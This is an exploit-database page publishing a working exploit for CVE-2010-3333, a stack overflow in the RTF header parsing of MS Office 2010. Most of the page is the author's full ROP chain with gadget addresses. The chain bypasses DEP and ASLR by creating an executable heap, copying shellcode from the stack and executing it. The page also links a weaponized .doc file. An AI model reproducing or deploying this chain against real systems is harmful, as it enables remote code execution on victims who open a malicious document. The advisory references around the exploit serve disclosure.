MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

2011.07.04
Credit: Snake
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit # Date: 7/3/2011 # Author: Snake ( Shahriyar.j < at > gmail ) # Version: MS Office <= 2010 # Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7 # CVE : CVE-2010-3333 # This is the exploit I wrote for Abysssec "The Arashi" article. # It gracefully bypass DEP/ASLR in MS Office 2010, # and we named this method "Ikazuchi DEP/ASRL Bypass" : > # unfortunately msgr3en.dll loads a few seconds after opining office, # so just need to open open Office , and then open exploit after a few second and saw a nice calc. # # The Arashi : http://abysssec.com/files/The_Arashi.pdf http://www.exploit-db.com/download_pdf/17469 # me : twitter.com/ponez # aslo check here for Persian docs of this methods and more : http://www.0days.ir/article/ Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc # # and the Rop : 3F2CB9E0 POP ECX RETN # HeapCreate() IAT = 3F10115C 3F389CA5 MOV EAX,DWORD PTR DS:[ECX] RETN # EAX == HeapCreate() Address 3F39AFCF CALL EAX RETN # Call HeapCreate() and Create a Executable Heap :D # after this call, EAX contain our Heap Address. 0x3F2CB9E0 POP ECX RETN # pop 0x00008000 into ECX 0x3F39CB46 ADD EAX,ECX POP ESI RETN # add ECX to EAX and instead of calling HeapAlloc, # now EAX point to the RWX Heap :D 0x3F2CB9E0 POP ECX RETN # pop 0x3F3B3DC0 into ECX, it is a writable address. 0x3F2233CC MOV DWORD PTR DS:[ECX],EAX RETN # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;) 0x3F2D59DF POP EAX ADD DWORD PTR DS:[EAX],ESP RETN # pop 0x3F3B3DC4 into EAX , it is writable address with zero! # then we add ESP to the Zero which result in storing ESP into that address, # we need ESP address for copying shellcode ( which stores in Stack ), # and we have to get it dynamically at run-time, now with my tricky instruction, we have it! 0x3F2F18CC POP EAX RETN # pop 0x3F3B3DC4 ( ESP address ) into EAX 0x3F2B745E MOV ECX,DWORD PTR DS:[EAX] RETN # now ECX point to nearly offset of Stack. 0x3F39795E POP EDX RETN # pop 0x00000024 into EDX 0x3F39CB44 ADD ECX,EDX ADD EAX,ECX POP ESI RETN # add 0x24 to ECX ( Stack address ) 0x3F398267 MOV EAX,ECX RETN # EAX = ECX ; ) 0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX XOR EAX,EAX POP ESI RETN # mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location, # and the popping it into ESI ! now ESI point where shellcode stores in stack :D 0x3F398267 MOV EAX,ECX RETN # EAX = ECX ; ) 3F2CB9E0 POP ECX RETN # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX 0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX] RETN # now EAX point to our RWX Heap 0x3F2B0A7C XCHG EAX,EDI RETN 4 # EDI = Our RWX Heap Address 3F2CB9E0 POP ECX RETN # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX 0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX] RETN # now EAX point to our RWX Heap 0x3F38BEFB ADD AL,58 RETN # just skip some junks ; ) 3F2CB9E0 POP ECX RETN # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent ) 3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] POP EDI POP ESI RETN # Copy shellcode from stack into RWX Heap 3F39AFCF CALL EAX RETN # KABOOM !!! Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc

References:

http://www.us-cert.gov/cas/techalerts/TA10-313A.html
http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx
http://www.vupen.com/english/advisories/2010/2923
http://www.securitytracker.com/id?1024705
http://www.securityfocus.com/bid/44652
http://secunia.com/advisories/42144
http://2000secunia.com/advisories/38521
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880
http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11931


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top